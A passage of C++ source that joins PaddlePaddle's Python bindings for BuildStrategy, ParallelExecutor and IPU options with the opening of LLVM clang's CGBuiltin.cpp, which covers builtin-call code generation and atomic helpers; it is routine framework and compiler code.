[](const BuildStrategy &self) { return self.gradient_scale_; },
[](BuildStrategy &self,
BuildStrategy::GradientScaleStrategy strategy) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.gradient_scale_ = strategy;
},
R"DOC((paddle.static.BuildStrategy.GradientScaleStrategy, optional): there are three
ways of defining :math:`loss@grad` in ParallelExecutor, that is, CoeffNumDevice,
One and Customized. By default, ParallelExecutor sets the :math:`loss@grad`
according to the number of devices. If you want to customize :math:`loss@grad`,
you can choose Customized. Default is 'CoeffNumDevice'.
Examples:
.. code-block:: python
import numpy
import os
import paddle
import paddle.static as static
paddle.enable_static()
use_cuda = True
place = paddle.CUDAPlace(0) if use_cuda else paddle.CPUPlace()
exe = static.Executor(place)
# NOTE: If you use CPU to run the program, you need
# to specify the CPU_NUM, otherwise, paddle will use
# all the number of the logic core as the CPU_NUM,
# in that case, the batch size of the input should be
                    # greater than CPU_NUM; if not, the process will
                    # fail with an exception.
if not use_cuda:
os.environ['CPU_NUM'] = str(2)
places = static.cpu_places()
else:
places = static.cuda_places()
data = static.data(name='X', shape=[None, 1], dtype='float32')
hidden = static.nn.fc(input=data, size=10)
loss = paddle.mean(hidden)
paddle.optimizer.SGD(learning_rate=0.01).minimize(loss)
exe.run(static.default_startup_program())
build_strategy = static.BuildStrategy()
build_strategy.gradient_scale_strategy = \
static.BuildStrategy.GradientScaleStrategy.Customized
compiled_prog = static.CompiledProgram(
static.default_main_program()).with_data_parallel(
loss_name=loss.name, build_strategy=build_strategy,
places=places)
dev_count = len(places)
x = numpy.random.random(size=(10, 1)).astype('float32')
loss_grad = numpy.ones((dev_count)).astype("float32") * 0.01
loss_grad_name = loss.name+"@GRAD"
loss_data = exe.run(compiled_prog,
feed={"X": x, loss_grad_name : loss_grad},
fetch_list=[loss.name, loss_grad_name])
)DOC")
.def_property(
"debug_graphviz_path",
[](const BuildStrategy &self) { return self.debug_graphviz_path_; },
[](BuildStrategy &self, const std::string &path) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.debug_graphviz_path_ = path;
},
R"DOC((str, optional): debug_graphviz_path indicates the path that
writing the SSA Graph to file in the form of graphviz.
It is useful for debugging. Default is empty string, that is, ""
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.debug_graphviz_path = "./graph"
)DOC")
.def_property(
"enable_sequential_execution",
[](const BuildStrategy &self) {
return self.enable_sequential_execution_;
},
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.enable_sequential_execution_ = b;
},
R"DOC((bool, optional): If set True, the execution order of ops would
be the same as what is in the program. Default is False.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.enable_sequential_execution = True
)DOC")
.def_property(
"remove_unnecessary_lock",
[](const BuildStrategy &self) {
return self.remove_unnecessary_lock_;
},
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.remove_unnecessary_lock_ = b;
},
R"DOC((bool, optional): If set True, some locks in GPU ops would be
released and ParallelExecutor would run faster. Default is True.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.remove_unnecessary_lock = True
)DOC")
.def_property(
"num_trainers",
[](const BuildStrategy &self) { return self.num_trainers_; },
[](BuildStrategy &self, int num_trainers) {
#ifdef WIN32
PADDLE_THROW(platform::errors::Unavailable(
"Distribution mode is not supported on Windows platform."));
#endif
self.num_trainers_ = num_trainers;
})
.def_property(
"trainers_endpoints",
[](const BuildStrategy &self) { return self.trainers_endpoints_; },
[](BuildStrategy &self,
const std::vector<std::string> &trainers_endpoints) {
self.trainers_endpoints_ = trainers_endpoints;
})
.def_property("trainer_id",
[](const BuildStrategy &self) { return self.trainer_id_; },
[](BuildStrategy &self, int trainer_id) {
self.trainer_id_ = trainer_id;
})
.def_property(
"nccl_comm_num",
[](const BuildStrategy &self) { return self.nccl_comm_num_; },
[](BuildStrategy &self, int nccl_comm_num) {
self.nccl_comm_num_ = nccl_comm_num;
})
.def_property(
"bkcl_comm_num",
[](const BuildStrategy &self) { return self.bkcl_comm_num_; },
[](BuildStrategy &self, int bkcl_comm_num) {
self.bkcl_comm_num_ = bkcl_comm_num;
})
.def_property("use_hierarchical_allreduce",
[](const BuildStrategy &self) {
return self.use_hierarchical_allreduce_;
},
[](BuildStrategy &self, bool use) {
self.use_hierarchical_allreduce_ = use;
})
.def_property("hierarchical_allreduce_inter_nranks",
[](const BuildStrategy &self) {
return self.hierarchical_allreduce_inter_nranks_;
},
[](BuildStrategy &self, int nranks) {
self.hierarchical_allreduce_inter_nranks_ = nranks;
})
.def_property(
"fuse_elewise_add_act_ops",
[](const BuildStrategy &self) {
return self.fuse_elewise_add_act_ops_;
},
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.fuse_elewise_add_act_ops_ = b;
},
R"DOC((bool, optional): fuse_elewise_add_act_ops indicate whether
to fuse elementwise_add_op and activation_op,
it may make the execution faster. Default is False.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.fuse_elewise_add_act_ops = True
)DOC")
.def_property(
"fuse_bn_act_ops",
[](const BuildStrategy &self) { return self.fuse_bn_act_ops_; },
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.fuse_bn_act_ops_ = b;
},
R"DOC((bool, optional): fuse_bn_act_ops indicate whether
to fuse batch_norm and activation_op,
it may make the execution faster. Default is False.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.fuse_bn_act_ops = True
)DOC")
.def_property(
"fuse_bn_add_act_ops",
[](const BuildStrategy &self) { return self.fuse_bn_add_act_ops_; },
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.fuse_bn_add_act_ops_ = b;
},
R"DOC((bool, optional): fuse_bn_add_act_ops indicate whether
to fuse batch_norm, elementwise_add and activation_op,
it may make the execution faster. Default is True
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.fuse_bn_add_act_ops = True
)DOC")
.def_property(
"enable_auto_fusion",
[](const BuildStrategy &self) { return self.enable_auto_fusion_; },
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.enable_auto_fusion_ = b;
},
R"DOC((bool, optional): Whether to enable fusing subgraph to a
fusion_group. Now we only support fusing subgraph that composed
of elementwise-like operators, such as elementwise_add/mul
without broadcast and activations.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.enable_auto_fusion = True
)DOC")
.def_property(
"fuse_relu_depthwise_conv",
[](const BuildStrategy &self) {
return self.fuse_relu_depthwise_conv_;
},
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.fuse_relu_depthwise_conv_ = b;
},
R"DOC((bool, optional): fuse_relu_depthwise_conv indicate whether
to fuse relu and depthwise_conv2d,
it will save GPU memory and may make the execution faster.
This options is only available in GPU devices.
Default is False.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.fuse_relu_depthwise_conv = True
)DOC")
.def_property("fuse_broadcast_ops",
[](const BuildStrategy &self) {
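                      // An unset optional (paddle::none) is reported to
                      // Python as true, i.e. the fusion is treated as enabled
                      // by default; the same convention is used for
                      // fuse_all_optimizer_ops and fuse_all_reduce_ops below.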
return self.fuse_broadcast_ops_ == true ||
self.fuse_broadcast_ops_ == paddle::none;
},
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, "
"cannot be configured again."));
self.fuse_broadcast_ops_ = b;
},
R"DOC((bool, optional): fuse_broadcast_op indicates whether
to fuse the broadcast ops. Note that, in Reduce mode,
fusing broadcast ops may make the program faster. Because
fusing broadcast OP equals delaying the execution of all
broadcast Ops, in this case, all nccl streams are used only
for NCCLReduce operations for a period of time. Default False.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.fuse_broadcast_ops = True
)DOC")
.def_property("fuse_all_optimizer_ops",
[](const BuildStrategy &self) {
return self.fuse_all_optimizer_ops_ == true ||
self.fuse_all_optimizer_ops_ == paddle::none;
},
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, "
"cannot be configured again."));
self.fuse_all_optimizer_ops_ = b;
})
.def_property(
"sync_batch_norm",
[](const BuildStrategy &self) { return self.sync_batch_norm_; },
[](BuildStrategy &self, bool b) {
PADDLE_ENFORCE_NE(self.IsFinalized(), true,
platform::errors::PreconditionNotMet(
"BuildStrategy has been finlaized, cannot be "
"configured again."));
self.sync_batch_norm_ = b;
},
R"DOC((bool, optional): sync_batch_norm indicates whether to use
synchronous batch normalization which synchronizes the mean
and variance through multi-devices in training phase.
Current implementation doesn't support FP16 training and CPU.
And only synchronous on one machine, not all machines.
Default is False.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.sync_batch_norm = True
)DOC")
.def_property(
"memory_optimize",
[](const BuildStrategy &self) -> py::object {
if (self.memory_optimize_) {
return py::cast(self.memory_optimize_.get());
} else {
return py::cast(nullptr);
}
},
[](BuildStrategy &self, const py::handle &value) {
auto *py_obj = value.ptr();
if (py_obj == nullptr || py_obj == Py_None) {
self.memory_optimize_ = paddle::none;
} else if (PyBool_Check(py_obj)) {
self.memory_optimize_ = (py_obj == Py_True);
} else {
PADDLE_THROW(platform::errors::InvalidArgument(
"BuildStrategy.memory_optimize must be set to None, False "
"or True"));
}
},
R"DOC((bool, optional): memory opitimize aims to save total memory
consumption, set to True to enable it.
Default None. None means framework would choose to use or not use
this strategy automatically. Currently, None means that it is
enabled when GC is disabled, and disabled when GC is enabled.
True means enabling and False means disabling. Default is None.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
build_strategy = static.BuildStrategy()
build_strategy.memory_optimize = True
)DOC")
.def_property(
"is_distribution",
[](const BuildStrategy &self) { return self.is_distribution_; },
[](BuildStrategy &self, bool b) {
#ifdef WIN32
if (b) {
PADDLE_THROW(platform::errors::Unavailable(
"Distribution mode is not supported on Windows platform."));
}
#else
self.is_distribution_ = b;
#endif
})
.def_property("async_mode",
[](const BuildStrategy &self) { return self.async_mode_; },
[](BuildStrategy &self, bool b) { self.async_mode_ = b; })
.def_property(
"enable_inplace",
[](const BuildStrategy &self) { return self.enable_inplace_; },
[](BuildStrategy &self, bool b) { self.enable_inplace_ = b; })
.def_property(
"enable_addto",
[](const BuildStrategy &self) { return self.enable_addto_; },
[](BuildStrategy &self, bool b) { self.enable_addto_ = b; })
.def_property(
"fuse_all_reduce_ops",
[](const BuildStrategy &self) {
return self.fuse_all_reduce_ops_ == true ||
self.fuse_all_reduce_ops_ == paddle::none;
},
[](BuildStrategy &self, bool b) { self.fuse_all_reduce_ops_ = b; })
.def_property("enable_backward_optimizer_op_deps",
[](const BuildStrategy &self) {
return self.enable_backward_optimizer_op_deps_;
},
[](BuildStrategy &self, bool b) {
self.enable_backward_optimizer_op_deps_ = b;
})
.def_property(
"cache_runtime_context",
[](const BuildStrategy &self) { return self.cache_runtime_context_; },
[](BuildStrategy &self, bool b) { self.cache_runtime_context_ = b; })
.def_property(
"mkldnn_enabled_op_types",
[](const BuildStrategy &self) {
return self.mkldnn_enabled_op_types_;
},
[](BuildStrategy &self,
const std::unordered_set<std::string> &mkldnn_enabled_op_types) {
self.mkldnn_enabled_op_types_ = mkldnn_enabled_op_types;
})
.def_property(
"fix_op_run_order",
[](const BuildStrategy &self) { return self.fix_op_run_order_; },
[](BuildStrategy &self, bool fix_op_run_order) {
self.fix_op_run_order_ = fix_op_run_order;
})
.def_property("allow_cuda_graph_capture",
[](const BuildStrategy &self) {
return self.allow_cuda_graph_capture_;
},
[](BuildStrategy &self, bool allow_cuda_graph_capture) {
self.allow_cuda_graph_capture_ = allow_cuda_graph_capture;
})
.def("_copy",
[](const BuildStrategy &self) {
auto new_bs = self;
new_bs.ClearFinalized();
return new_bs;
})
.def("_finalize_strategy_and_create_passes",
[](BuildStrategy &self) -> std::shared_ptr<ir::PassBuilder> {
return self.CreatePassesFromStrategy(true);
},
R"DOC(Allow user to customized passes. Normally model-specific
optimization passes should be defined in this way. BuildStrategy
cannot be updated after being finalized.)DOC");
m.def("_set_cached_executor_build_strategy",
[](int64_t program_id, const BuildStrategy &build_strategy) {
auto &cached_exe_info = framework::ExecutorInfoCache::Instance();
cached_exe_info.SetBuildStrategy(program_id, build_strategy);
});
pe.def(py::init<const std::vector<platform::Place> &,
const std::vector<std::string> &, const std::string &,
Scope *, std::vector<Scope *> &, const ExecutionStrategy &,
const BuildStrategy &, ir::Graph *>())
// NOTE: even though we return a vec<Scope*>* to Python with the reference
// policy, we still cannot get local_scope from this vector, since the
// elements of vec<Scope*> will be freed by the Python GC. We can only
// return Scope* one by one and mark them as references.
.def("local_scopes",
[](ParallelExecutor &self) -> std::vector<Scope *> * {
return &self.GetLocalScopes();
},
py::return_value_policy::reference)
.def("drop_local_exe_scopes", &ParallelExecutor::DropLocalExeScopes)
.def("_need_create_local_exe_scopes",
&ParallelExecutor::NeedCreateLocalExeScope)
.def("feed_tensors_into_local_scopes",
&ParallelExecutor::FeedTensorsIntoLocalScopes)
.def("feed_and_split_tensor_into_local_scopes",
&ParallelExecutor::FeedAndSplitTensorIntoLocalScopes)
.def("run",
[](ParallelExecutor &self,
const std::vector<std::string> &fetch_tensors,
bool return_merged) -> py::object {
paddle::framework::FetchResultType ret;
{
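               // Release the GIL while the executor runs so Python threads
               // are not blocked during execution.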
pybind11::gil_scoped_release release;
ret = self.Run(fetch_tensors, return_merged);
}
if (return_merged) {
return py::cast(
std::move(BOOST_GET(paddle::framework::FetchList, ret)));
} else {
return py::cast(std::move(
BOOST_GET(paddle::framework::FetchUnmergedList, ret)));
}
})
.def("device_count", &ParallelExecutor::DeviceCount);
#ifdef PADDLE_WITH_IPU
py::class_<platform::ipu::IpuBackend,
std::unique_ptr<platform::ipu::IpuBackend, py::nodelete>>(
m, "IpuBackend")
// manage IpuBackend in C++
.def("get_instance",
[]() {
return std::unique_ptr<platform::ipu::IpuBackend, py::nodelete>(
platform::ipu::IpuBackend::GetInstance());
},
py::return_value_policy::reference)
.def("detach", &platform::ipu::IpuBackend::Detach)
.def("reset", &platform::ipu::IpuBackend::Reset)
.def("set_scope", &platform::ipu::IpuBackend::SetScope)
.def("set_ipu_strategy", &platform::ipu::IpuBackend::SetIpuStrategy)
.def("save_model_proto", &platform::ipu::IpuBackend::SaveModelProto);
py::class_<platform::ipu::IpuStrategy>(m, "IpuStrategy")
.def(py::init())
.def("set_options",
[](platform::ipu::IpuStrategy &self, const py::dict &opt) {
for (auto element : opt) {
auto option_name = element.first.cast<std::string>();
VLOG(10) << "Set option: " << option_name;
if (py::isinstance<py::bool_>(element.second)) {
self.AddBoolOption(option_name, element.second.cast<bool>());
} else if (py::isinstance<py::float_>(element.second)) {
self.AddDoubleOption(option_name,
element.second.cast<double>());
} else if (py::isinstance<py::int_>(element.second)) {
self.AddUint64Option(option_name,
element.second.cast<std::uint64_t>());
} else if (py::isinstance<py::str>(element.second)) {
self.AddStringOption(option_name,
element.second.cast<std::string>());
} else if (py::isinstance<py::set>(element.second) ||
py::isinstance<py::list>(element.second)) {
for (auto option : element.second.cast<py::list>()) {
std::string option_val;
if (py::isinstance<py::str>(option)) {
option_val = option.cast<std::string>();
} else if (py::isinstance<py::int_>(option)) {
option_val = std::to_string(option.cast<std::uint64_t>());
} else {
PADDLE_THROW(platform::errors::Unimplemented(
"Failed to convert type: %s when set IpuStrategy "
"option: %s",
option.get_type(), option_name));
}
self.InsertStringOption(option_name, option_val);
}
} else if (py::isinstance<py::dict>(element.second)) {
if (option_name.rfind("location_", 0) == 0) {
for (auto option : element.second.cast<py::dict>()) {
self.SetTensorLocation(
option_name, option.first.cast<std::string>(),
option.second.cast<std::uint64_t>());
}
} else if (option_name == "custom_op") {
std::string paddle_op;
std::string popart_op;
std::string domain;
int version = -1;
for (auto option : element.second.cast<py::dict>()) {
std::string option_key = option.first.cast<std::string>();
if (option_key == "paddle_op") {
paddle_op = option.second.cast<std::string>();
} else if (option_key == "popart_op") {
popart_op = option.second.cast<std::string>();
} else if (option_key == "domain") {
domain = option.second.cast<std::string>();
} else if (option_key == "version") {
version = option.second.cast<int>();
} else {
PADDLE_THROW(platform::errors::InvalidArgument(
"Invalid argument, key must be one of paddle_op, "
"popart_op, domain or version, but revecived %s",
option_key));
}
}
self.AddCustomOp(paddle_op, popart_op, domain, version);
} else {
for (auto option : element.second.cast<py::dict>()) {
std::string option_key = option.first.cast<std::string>();
std::string option_val;
if (py::isinstance<py::str>(option.second)) {
option_val = option.second.cast<std::string>();
} else if (py::isinstance<py::int_>(option.second)) {
option_val =
std::to_string(option.second.cast<std::uint64_t>());
} else {
PADDLE_THROW(platform::errors::Unimplemented(
"Failed to convert value type: %s when set "
"IpuStrategy option: %s",
option.second.get_type(), option_key));
}
self.InsertStringPairOption(option_name, option_key,
option_val);
}
}
} else {
PADDLE_THROW(platform::errors::InvalidArgument(
"Invalid IpuStrategy option value type: %s, please check "
"input value for option: %s",
element.second.get_type(), option_name));
}
}
})
.def("get_option",
[](platform::ipu::IpuStrategy &self, const std::string &name) {
py::dict res;
auto option_type = self.GetOptionType(name);
res["name"] = name;
res["type"] = option_type;
if (option_type == "vector") {
auto value = self.GetVectorOption(name);
res["value"] = value;
} else if (option_type == "map") {
auto value = self.GetMapOption(name);
res["value"] = value;
} else {
auto value_s = self.GetOption(name);
res["value_s"] = value_s;
if (option_type == "bool") {
res["value"] = static_cast<bool>(std::stoi(value_s));
} else if (option_type == "uint64") {
res["value"] = std::stoul(value_s);
} else if (option_type == "double") {
res["value"] = std::stod(value_s);
} else if (option_type == "string") {
res["value"] = value_s;
}
}
return res;
})
.def("get_all_option_names",
&platform::ipu::IpuStrategy::GetAllOptionNames)
.def("enable_pattern", &platform::ipu::IpuStrategy::EnablePattern)
.def("disable_pattern", &platform::ipu::IpuStrategy::DisablePattern)
.def("is_pattern_enabled", &platform::ipu::IpuStrategy::IsPatternEnabled);
#endif
BindFleetWrapper(&m);
BindIO(&m);
#if defined(PADDLE_WITH_PSLIB) && !defined(PADDLE_WITH_HETERPS)
BindHeterWrapper(&m);
BindMetrics(&m);
#endif
#ifdef PADDLE_WITH_HETERPS
BindPSGPUWrapper(&m);
#endif
BindGlooWrapper(&m);
BindBoxHelper(&m);
#ifdef PADDLE_WITH_BOX_PS
BindBoxWrapper(&m);
#endif
#if defined(PADDLE_WITH_NCCL) || defined(PADDLE_WITH_RCCL)
BindNCCLWrapper(&m);
#endif
#ifdef PADDLE_WITH_GLOO
BindGlooContext(&m);
#endif
BindGraph(&m);
BindNode(&m);
BindPass(&m);
BindInferenceApi(&m);
BindCompatible(&m);
BindDataset(&m);
BindGenerator(&m);
#ifndef PADDLE_ON_INFERENCE
BindDistributed(&m);
#endif
#ifdef PADDLE_WITH_ASCEND
BindAscendWrapper(&m);
BindAscendGraph(&m);
BindAscendDevice(&m);
#endif
#ifdef PADDLE_WITH_CRYPTO
BindCrypto(&m);
#endif
#if defined PADDLE_WITH_PSCORE
BindDistFleetWrapper(&m);
BindPSHost(&m);
BindCommunicatorContext(&m);
BindDistCommunicator(&m);
BindHeterClient(&m);
BindGraphPyFeatureNode(&m);
BindGraphNode(&m);
BindGraphPyService(&m);
BindGraphPyServer(&m);
BindGraphPyClient(&m);
BindIndexNode(&m);
BindTreeIndex(&m);
BindIndexWrapper(&m);
BindIndexSampler(&m);
BindSparseShardingTools(&m);
#endif
}
} // namespace pybind
} // namespace paddle
|
//===---- CGBuiltin.cpp - Emit LLVM Code for builtins ---------------------===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
//
// This contains code to emit Builtin calls as LLVM code.
//
//===----------------------------------------------------------------------===//
#include "CGCUDARuntime.h"
#include "CGCXXABI.h"
#include "CGObjCRuntime.h"
#include "CGOpenCLRuntime.h"
#include "CGRecordLayout.h"
#include "CodeGenFunction.h"
#include "CodeGenModule.h"
#include "ConstantEmitter.h"
#include "PatternInit.h"
#include "TargetInfo.h"
#include "clang/AST/ASTContext.h"
#include "clang/AST/Attr.h"
#include "clang/AST/Decl.h"
#include "clang/AST/OSLog.h"
#include "clang/Basic/TargetBuiltins.h"
#include "clang/Basic/TargetInfo.h"
#include "clang/CodeGen/CGFunctionInfo.h"
#include "llvm/ADT/APFloat.h"
#include "llvm/ADT/APInt.h"
#include "llvm/ADT/SmallPtrSet.h"
#include "llvm/ADT/StringExtras.h"
#include "llvm/Analysis/ValueTracking.h"
#include "llvm/IR/DataLayout.h"
#include "llvm/IR/InlineAsm.h"
#include "llvm/IR/Intrinsics.h"
#include "llvm/IR/IntrinsicsAArch64.h"
#include "llvm/IR/IntrinsicsAMDGPU.h"
#include "llvm/IR/IntrinsicsARM.h"
#include "llvm/IR/IntrinsicsBPF.h"
#include "llvm/IR/IntrinsicsHexagon.h"
#include "llvm/IR/IntrinsicsNVPTX.h"
#include "llvm/IR/IntrinsicsPowerPC.h"
#include "llvm/IR/IntrinsicsR600.h"
#include "llvm/IR/IntrinsicsRISCV.h"
#include "llvm/IR/IntrinsicsS390.h"
#include "llvm/IR/IntrinsicsWebAssembly.h"
#include "llvm/IR/IntrinsicsX86.h"
#include "llvm/IR/MDBuilder.h"
#include "llvm/IR/MatrixBuilder.h"
#include "llvm/Support/ConvertUTF.h"
#include "llvm/Support/ScopedPrinter.h"
#include "llvm/Support/X86TargetParser.h"
#include <sstream>
using namespace clang;
using namespace CodeGen;
using namespace llvm;
static
int64_t clamp(int64_t Value, int64_t Low, int64_t High) {
return std::min(High, std::max(Low, Value));
}
static void initializeAlloca(CodeGenFunction &CGF, AllocaInst *AI, Value *Size,
Align AlignmentInBytes) {
ConstantInt *Byte;
switch (CGF.getLangOpts().getTrivialAutoVarInit()) {
case LangOptions::TrivialAutoVarInitKind::Uninitialized:
// Nothing to initialize.
return;
case LangOptions::TrivialAutoVarInitKind::Zero:
Byte = CGF.Builder.getInt8(0x00);
break;
case LangOptions::TrivialAutoVarInitKind::Pattern: {
llvm::Type *Int8 = llvm::IntegerType::getInt8Ty(CGF.CGM.getLLVMContext());
Byte = llvm::dyn_cast<llvm::ConstantInt>(
initializationPatternFor(CGF.CGM, Int8));
break;
}
}
if (CGF.CGM.stopAutoInit())
return;
auto *I = CGF.Builder.CreateMemSet(AI, Byte, Size, AlignmentInBytes);
I->addAnnotationMetadata("auto-init");
}
/// getBuiltinLibFunction - Given a builtin id for a function like
/// "__builtin_fabsf", return a Function* for "fabsf".
llvm::Constant *CodeGenModule::getBuiltinLibFunction(const FunctionDecl *FD,
unsigned BuiltinID) {
assert(Context.BuiltinInfo.isLibFunction(BuiltinID));
// Get the name, skip over the __builtin_ prefix (if necessary).
StringRef Name;
GlobalDecl D(FD);
// TODO: This list should be expanded or refactored after all GCC-compatible
// std libcall builtins are implemented.
static SmallDenseMap<unsigned, StringRef, 8> F128Builtins{
{Builtin::BI__builtin_printf, "__printfieee128"},
{Builtin::BI__builtin_vsnprintf, "__vsnprintfieee128"},
{Builtin::BI__builtin_vsprintf, "__vsprintfieee128"},
{Builtin::BI__builtin_sprintf, "__sprintfieee128"},
{Builtin::BI__builtin_snprintf, "__snprintfieee128"},
{Builtin::BI__builtin_fprintf, "__fprintfieee128"},
{Builtin::BI__builtin_nexttowardf128, "__nexttowardieee128"},
};
// If the builtin has been declared explicitly with an assembler label,
// use the mangled name. This differs from the plain label on platforms
// that prefix labels.
if (FD->hasAttr<AsmLabelAttr>())
Name = getMangledName(D);
else {
    // TODO: This mutation should also be applied to targets other than PPC,
    // once the backend supports IEEE 128-bit style libcalls.
if (getTriple().isPPC64() &&
&getTarget().getLongDoubleFormat() == &llvm::APFloat::IEEEquad() &&
F128Builtins.find(BuiltinID) != F128Builtins.end())
Name = F128Builtins[BuiltinID];
else
Name = Context.BuiltinInfo.getName(BuiltinID) + 10;
}
llvm::FunctionType *Ty =
cast<llvm::FunctionType>(getTypes().ConvertType(FD->getType()));
return GetOrCreateLLVMFunction(Name, Ty, D, /*ForVTable=*/false);
}
/// Emit the conversions required to turn the given value into an
/// integer of the given size.
static Value *EmitToInt(CodeGenFunction &CGF, llvm::Value *V,
QualType T, llvm::IntegerType *IntType) {
V = CGF.EmitToMemory(V, T);
if (V->getType()->isPointerTy())
return CGF.Builder.CreatePtrToInt(V, IntType);
assert(V->getType() == IntType);
return V;
}
static Value *EmitFromInt(CodeGenFunction &CGF, llvm::Value *V,
QualType T, llvm::Type *ResultType) {
V = CGF.EmitFromMemory(V, T);
if (ResultType->isPointerTy())
return CGF.Builder.CreateIntToPtr(V, ResultType);
assert(V->getType() == ResultType);
return V;
}
/// Utility to insert an atomic instruction based on Intrinsic::ID
/// and the expression node.
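/// For example, __sync_fetch_and_add(p, v) becomes an 'atomicrmw add' on p
/// with v (sequentially consistent by default), returning the old value.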
static Value *MakeBinaryAtomicValue(
CodeGenFunction &CGF, llvm::AtomicRMWInst::BinOp Kind, const CallExpr *E,
AtomicOrdering Ordering = AtomicOrdering::SequentiallyConsistent) {
QualType T = E->getType();
assert(E->getArg(0)->getType()->isPointerType());
assert(CGF.getContext().hasSameUnqualifiedType(T,
E->getArg(0)->getType()->getPointeeType()));
assert(CGF.getContext().hasSameUnqualifiedType(T, E->getArg(1)->getType()));
llvm::Value *DestPtr = CGF.EmitScalarExpr(E->getArg(0));
unsigned AddrSpace = DestPtr->getType()->getPointerAddressSpace();
llvm::IntegerType *IntType =
llvm::IntegerType::get(CGF.getLLVMContext(),
CGF.getContext().getTypeSize(T));
llvm::Type *IntPtrType = IntType->getPointerTo(AddrSpace);
llvm::Value *Args[2];
Args[0] = CGF.Builder.CreateBitCast(DestPtr, IntPtrType);
Args[1] = CGF.EmitScalarExpr(E->getArg(1));
llvm::Type *ValueType = Args[1]->getType();
Args[1] = EmitToInt(CGF, Args[1], T, IntType);
llvm::Value *Result = CGF.Builder.CreateAtomicRMW(
Kind, Args[0], Args[1], Ordering);
return EmitFromInt(CGF, Result, T, ValueType);
}
static Value *EmitNontemporalStore(CodeGenFunction &CGF, const CallExpr *E) {
Value *Val = CGF.EmitScalarExpr(E->getArg(0));
Value *Address = CGF.EmitScalarExpr(E->getArg(1));
// Convert the type of the pointer to a pointer to the stored type.
Val = CGF.EmitToMemory(Val, E->getArg(0)->getType());
unsigned SrcAddrSpace = Address->getType()->getPointerAddressSpace();
Value *BC = CGF.Builder.CreateBitCast(
Address, llvm::PointerType::get(Val->getType(), SrcAddrSpace), "cast");
LValue LV = CGF.MakeNaturalAlignAddrLValue(BC, E->getArg(0)->getType());
LV.setNontemporal(true);
CGF.EmitStoreOfScalar(Val, LV, false);
return nullptr;
}
static Value *EmitNontemporalLoad(CodeGenFunction &CGF, const CallExpr *E) {
Value *Address = CGF.EmitScalarExpr(E->getArg(0));
LValue LV = CGF.MakeNaturalAlignAddrLValue(Address, E->getType());
LV.setNontemporal(true);
return CGF.EmitLoadOfScalar(LV, E->getExprLoc());
}
static RValue EmitBinaryAtomic(CodeGenFunction &CGF,
llvm::AtomicRMWInst::BinOp Kind,
const CallExpr *E) {
return RValue::get(MakeBinaryAtomicValue(CGF, Kind, E));
}
/// Utility to insert an atomic instruction based on Intrinsic::ID and
/// the expression node, where the return value is the result of the
/// operation.
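/// For example, __sync_add_and_fetch(p, v) performs the atomicrmw and then
/// recomputes old + v to produce the post-operation value; 'Invert' handles
/// the __sync_nand_and_fetch variants, which also complement the result.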
static RValue EmitBinaryAtomicPost(CodeGenFunction &CGF,
llvm::AtomicRMWInst::BinOp Kind,
const CallExpr *E,
Instruction::BinaryOps Op,
bool Invert = false) {
QualType T = E->getType();
assert(E->getArg(0)->getType()->isPointerType());
assert(CGF.getContext().hasSameUnqualifiedType(T,
E->getArg(0)->getType()->getPointeeType()));
assert(CGF.getContext().hasSameUnqualifiedType(T, E->getArg(1)->getType()));
llvm::Value *DestPtr = CGF.EmitScalarExpr(E->getArg(0));
unsigned AddrSpace = DestPtr->getType()->getPointerAddressSpace();
llvm::IntegerType *IntType =
